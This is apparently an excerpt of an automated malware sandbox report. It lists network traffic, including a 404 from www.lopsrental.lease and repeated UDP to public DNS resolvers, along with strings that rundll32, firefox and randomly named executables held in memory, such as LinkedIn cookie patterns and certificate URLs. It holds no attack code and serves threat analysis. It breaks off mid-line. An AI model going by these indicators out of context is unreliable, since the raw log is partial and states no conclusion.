        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 11:59:31 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
        Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
        Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
        Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: Zr26f1rL6r.exe, 0000000A.00000003.47750089783.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47747204902.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749712400.0000000000897000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47940136411.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749088416.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47748575933.000000000089B000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Zr26f1rL6r.exe, 0000000A.00000003.47750089783.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47747204902.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749712400.0000000000897000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47940136411.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749088416.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47748575933.000000000089B000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: explorer.exe, 0000000E.00000000.48061449754.000000000D0F5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBdu